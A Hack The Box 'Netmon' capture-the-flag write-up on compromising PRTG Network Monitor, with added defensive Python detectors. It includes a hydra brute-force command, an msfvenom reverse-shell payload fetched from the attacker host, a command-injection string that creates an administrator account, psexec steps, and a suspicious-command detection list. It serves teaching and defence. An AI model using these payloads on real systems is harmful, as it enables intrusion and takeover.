Link: https://app.hackthebox.eu/machines/177
Enumeration

Our full nmap scan reveals 13 open ports, including an ftp server and web server.
Web Server
Upon loading the web server, we are greeted with the login to PRTG Network Monitor v18.1.37.13946.
Looking at the documentation, the default username and password are prtgadmin / prtgadmin. Unfortunately for us, these credentials do not work. However, I am willing to bet the username still exists, so we can use hydra to brute force:
hydra -l prtgadmin -P /usr/share/wordlists/rockyou.txt 10.129.1.126 http-post-form "/public/checklogin.htm:username=^USER^&password=^PASS^:Your login has failed." -V
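From the defender's side, the hydra run above is very loud: one source address sends hundreds of POSTs to /public/checklogin.htm in a short time. The following Python script is an added example (not from the original write-up or from Paessler) that flags that pattern in a web server access log using a sliding window per source IP. The log lines are constructed samples in combined-log style; the path, threshold and window are assumptions you would tune for a real deployment.

```python
import re
from collections import Counter, defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample access log (combined-log style), not real traffic:
# one source repeatedly POSTing to the PRTG login form, one ordinary user
# browsing and logging in once.
SAMPLE_LOG = """\
10.10.14.5 - - [02/Apr/2019:10:15:01 +0000] "POST /public/checklogin.htm HTTP/1.1" 200 1532
10.10.14.5 - - [02/Apr/2019:10:15:02 +0000] "POST /public/checklogin.htm HTTP/1.1" 200 1532
10.10.14.5 - - [02/Apr/2019:10:15:02 +0000] "POST /public/checklogin.htm HTTP/1.1" 200 1532
10.10.14.9 - - [02/Apr/2019:10:15:03 +0000] "GET /index.htm HTTP/1.1" 200 8812
10.10.14.5 - - [02/Apr/2019:10:15:03 +0000] "POST /public/checklogin.htm HTTP/1.1" 200 1532
10.10.14.5 - - [02/Apr/2019:10:15:04 +0000] "POST /public/checklogin.htm HTTP/1.1" 200 1532
10.10.14.9 - - [02/Apr/2019:10:15:10 +0000] "POST /public/checklogin.htm HTTP/1.1" 302 0
10.10.14.5 - - [02/Apr/2019:10:15:05 +0000] "POST /public/checklogin.htm HTTP/1.1" 200 1532
"""

LOGIN_PATH = "/public/checklogin.htm"  # PRTG login form target (from the hydra command)

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_login_attempts(lines, path=LOGIN_PATH):
    """Return (timestamp, source_ip) for every POST to the login form."""
    events = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or m["path"] != path:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        events.append((ts, m["ip"]))
    events.sort()  # log lines are not guaranteed to be in order
    return events


def detect_bruteforce(lines, path=LOGIN_PATH, threshold=5,
                      window=timedelta(seconds=60)):
    """Flag source IPs that send >= threshold login POSTs inside any window.

    Returns {ip: total login POSTs from that ip} for flagged sources only.
    """
    recent = defaultdict(deque)   # ip -> timestamps still inside the window
    totals = Counter()
    flagged = set()
    for ts, ip in parse_login_attempts(lines, path):
        totals[ip] += 1
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:  # drop attempts that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            flagged.add(ip)
    return {ip: totals[ip] for ip in sorted(flagged)}


if __name__ == "__main__":
    for ip, n in detect_bruteforce(SAMPLE_LOG.splitlines()).items():
        print(f"possible brute force against {LOGIN_PATH} from {ip}: {n} attempts")
```

The access log does not carry the "Your login has failed." body that hydra keys on, so the check counts attempts rather than failures; five POSTs to the login form in a minute from one address is already well outside normal interactive use, and the same threshold is what an account-lockout or rate-limit rule in front of PRTG would enforce.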
FTP Server
While hydra is running, I went ahead and checked out the ftp server. It turns out they have anonymous login enabled and the entire C:\ drive is the share. So by navigating to C:\Users\Public we can see our first flag. Let’s grab it using:
get user.txt /home/kali/user.txt
Hopefully we can find more stuff here, like perhaps the prtgadmin credentials. According to the documentation, we can find some files in C:\Program Files (X86)\PRTG Network Monitor. I did find the setup log, where we can see they set the admin email to [email protected].
There’s also a firewall rule stating that PRTG Administrator.exe is allowed through the firewall. This application would allow us to reset the password:

While investigating the option for a remote probe, I stumbled upon a screenshot of the default conf location, which is C:\ProgramData\Paessler:

While this folder is hidden from FTP, we can type the path in manually and grab PRTG Configuration.dat. This file has the information for the admin account!

However, I do not have a clue how to decode it. I searched for password and there are others in the file, but they are also encrypted. The same goes for the .old file. However, in the .old.bak file there is a plaintext password:
<dbpassword>
<!--- User: prtgadmin --->
PrTg@dmin2018
</dbpassword>
This password does not work on the admin panel but this file was saved in 2018 and now it is 2019, so if we increment the year it does log us in!
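The real lesson here is that a backup copy of the configuration kept a credential in the clear long after the live file was encrypted. The script below is an added example (not part of the write-up, not Paessler's code) of the audit a defender would run over a PRTG installation's configuration files: it pulls every <dbpassword> element, skips the ones marked encrypted and reports the rest by file and user without echoing the secret. The file contents are constructed stand-ins; the <flags><encrypted/></flags> marker is an assumption about how encrypted values are tagged, and the plaintext value is made up.

```python
import re

# Constructed stand-ins for PRTG Configuration.dat and the backup copies found
# next to it. The <flags><encrypted/></flags> marker is an assumption about how
# the live file tags encrypted values; the plaintext entry mirrors the shape of
# the .old.bak finding, with a made-up value.
SAMPLE_FILES = {
    "PRTG Configuration.dat": """<prtg>
  <dbpassword>
    <flags>
      <encrypted/>
    </flags>
    AAAAEXAMPLECIPHERTEXTAAAA==
  </dbpassword>
</prtg>""",
    "PRTG Configuration.old": """<prtg>
  <dbpassword>
    <flags>
      <encrypted/>
    </flags>
    BBBBEXAMPLECIPHERTEXTBBBB==
  </dbpassword>
</prtg>""",
    "PRTG Configuration.old.bak": """<prtg>
  <dbpassword>
    <!--- User: prtgadmin --->
    Example-Plaintext-2018
  </dbpassword>
</prtg>""",
}

# Regexes rather than an XML parser: the real file is large and the
# "<!--- ... --->" comment style is not well-formed XML.
DBPASSWORD_RE = re.compile(r"<dbpassword>(.*?)</dbpassword>", re.S)
USER_COMMENT_RE = re.compile(r"<!-+\s*User:\s*([^\s-]+)\s*-+>")
TAG_RE = re.compile(r"<[^>]*>")
BACKUP_SUFFIXES = (".old", ".bak")


def find_plaintext_dbpasswords(name, text):
    """Report every <dbpassword> in one file whose value is not encrypted.

    The secret itself is never returned, only its length.
    """
    findings = []
    for m in DBPASSWORD_RE.finditer(text):
        body = m.group(1)
        if "<encrypted/>" in body:
            continue
        user = USER_COMMENT_RE.search(body)
        value = TAG_RE.sub("", body).strip()  # drop the comment, keep the value
        if value:
            findings.append({
                "file": name,
                "user": user.group(1) if user else None,
                "secret_length": len(value),
                "backup": name.lower().endswith(BACKUP_SUFFIXES),
            })
    return findings


def audit(files):
    """Run the check over {filename: contents} and return all findings."""
    findings = []
    for name, text in files.items():
        findings.extend(find_plaintext_dbpasswords(name, text))
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_FILES):
        kind = "backup copy" if f["backup"] else "live config"
        print(f"{f['file']} ({kind}): plaintext dbpassword for user "
              f"{f['user']!r}, {f['secret_length']} chars")
```

Run against the three files, only the .old.bak copy is reported. The fix on a real host is to rotate the credential, remove stale backups from C:\ProgramData\Paessler, and make sure that directory is never reachable through an anonymous FTP share as it was here.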
CVE-2018-9276 (Failed)
After some google searching, I found a proof of concept for submitting a payload using the Add HTTP Advanced Sensor module and executing it via the EXE/Script Sensor module.
First, let’s generate a payload:
msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.10.x.x LPORT=4443 -f exe > shell.exe
Now we need to set up our handler for the meterpreter shell:
$ msfconsole
use exploit/multi/handler
set payload windows/meterpreter_reverse_tcp
set LHOST 10.10.x.x
Now I added a new HTTP Advanced Sensor:
- URL: http://10.10.x.x:8000/shell.exe
- Method: GET
- HTTP Monitoring Engine: Alternate/Compatibility Mode
- Proxy Settings: Disable Inherit
- Proxy Port: 80" "-proxy="127.0.0.1:80" -writeresult=\\127.0.0.1\\C$\\Program Files (X86)\PRTG Network Monitor\Custom Sensors\EXE\CVE-2018-19204.exe
Now we can see the python web server logging the GET requests where it grabs the shell. However, after attempting this for almost half an hour, it doesn’t seem to actually be writing the result to the drive, so let’s check out another CVE.
CVE-2018-9276 (Success!)
Fortunately, this software has no shortage of CVEs. There is another one that lets us run commands, such as creating our own admin account.
We need to go to Setup > Account Settings > Notifications, then Add a New Notification. Scroll down to Execute Program; the parameter field can be injected, so I did like so:
test.txt;net user lolacct h4cked! /add;net localgroup administrators lolacct /add
Back on the list of notifications, let’s click the icon on the right of our notification and then click the bell to execute it.
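The root cause is that the notification's parameter field is handed to a command interpreter without validation, so a `;` turns a file name into a command chain. The Python below is an added example (not from the write-up or from Paessler) of the two checks a defender wants: an allowlist validator for new parameter values, and an audit over existing notifications that reports shell metacharacters and embedded commands. The notification entries are constructed samples; the allowlist and the command list are assumptions to tighten for a given deployment.

```python
import re

# Characters that let cmd.exe chain or redirect commands. Parentheses and
# quotes are deliberately left out: they are legitimate in Windows paths such
# as "C:\Program Files (x86)\...".
SHELL_META_RE = re.compile(r"[;&|<>^`$\r\n]")
# Commands that have no business appearing in a file-name/argument field.
SUSPICIOUS_CMD_RE = re.compile(
    r"\b(net\s+user|net\s+localgroup|powershell|cmd(?:\.exe)?|certutil|bitsadmin)\b",
    re.I,
)
# Positive allowlist for what a notification parameter may contain
# (an assumption about what a given deployment needs; tighten as required).
ALLOWED_RE = re.compile(r"^[A-Za-z0-9 ._\\:/()\-]*$")


def check_parameter(value):
    """Return the list of reasons a parameter value is unsafe (empty = OK)."""
    reasons = []
    if not ALLOWED_RE.match(value):
        reasons.append("characters outside allowlist")
    if SHELL_META_RE.search(value):
        reasons.append("shell metacharacters")
    if SUSPICIOUS_CMD_RE.search(value):
        reasons.append("embedded command")
    return reasons


def scan_notifications(notifications):
    """Audit existing notifications; return [(name, reasons)] for bad ones."""
    return [(n["name"], check_parameter(n["parameter"]))
            for n in notifications if check_parameter(n["parameter"])]


# Constructed sample of exported notification entries (not from the box):
# two legitimate ones and one carrying the injected parameter from the write-up.
SAMPLE_NOTIFICATIONS = [
    {"name": "Daily report", "program": "report.exe", "parameter": "daily.txt"},
    {"name": "Ticket hook", "program": "ticket.bat",
     "parameter": r"C:\Program Files (x86)\PRTG Network Monitor\out.log"},
    {"name": "Cleanup", "program": "cleanup.exe",
     "parameter": "test.txt;net user lolacct h4cked! /add;"
                  "net localgroup administrators lolacct /add"},
]

if __name__ == "__main__":
    for name, reasons in scan_notifications(SAMPLE_NOTIFICATIONS):
        print(f"notification {name!r} rejected: {', '.join(reasons)}")
```

The allowlist is the actual mitigation (reject anything that is not a plain path or file name before it reaches the interpreter); the metacharacter and command checks are for auditing what is already configured on a host. Because the injected chain creates a local account and adds it to Administrators, the same activity also lands in the Windows Security log as event 4720 (user account created) followed by 4732 (member added to a local group), which gives a second, host-side place to catch it.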
Next I fired up msfconsole to get a meterpreter shell:
use exploit/windows/smb/psexec
set LHOST 10.10.x.x
set SMBUser lolacct
set SMBPass h4cked!
set RHOSTS 10.129.1.126
run
And we get a meterpreter shell!
Typing shell and then whoami shows we have nt authority\system. We can navigate to the Administrator’s Desktop for the root flag!